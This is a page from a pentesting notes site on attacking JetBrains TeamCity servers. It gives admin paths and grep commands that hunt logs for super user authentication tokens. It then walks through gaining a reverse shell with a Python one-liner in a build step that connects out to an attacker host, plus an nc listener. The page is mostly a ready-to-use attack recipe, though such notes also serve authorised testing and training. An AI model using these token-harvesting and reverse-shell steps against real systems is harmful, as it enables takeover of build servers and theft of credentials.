Exploit Notes

TeamCity Pentesting

Last modified: 2022-12-25

Web

TeamCity is a build management and continuous integration server from JetBrains.

Common Directories

/admin
/admin/admin.html

Find Super User Authentication Tokens

If we find a super user authentication token, we can login as super user using the token.

grep -rni 'authentication token' TeamCity/logs
grep -rni 'Super user authentication token' TeamCity/logs
grep -rni 'token' TeamCity/logs

Reverse Shell

  1. Login as super user.

  2. Create a new project in admin dashboard.

  3. Click "Manual" tab and fill required fields.

  4. A new project is created.

  5. In the project home, create a Build Configurations.

  6. In the build configuration page, click "Build Steps" on the left menus.

  7. Add build step.

  8. Select "Command Line" in Runner type.

  9. Put a Python reverse shell script in the "Custom script".

    export RHOST="<local-ip>";export RPORT=<local-port>;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
    
  10. Start listener in local machine.

    nc -lvnp 4444
    
  11. Click "Run" button in the build page.

  12. We should get a shell in terminal.

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.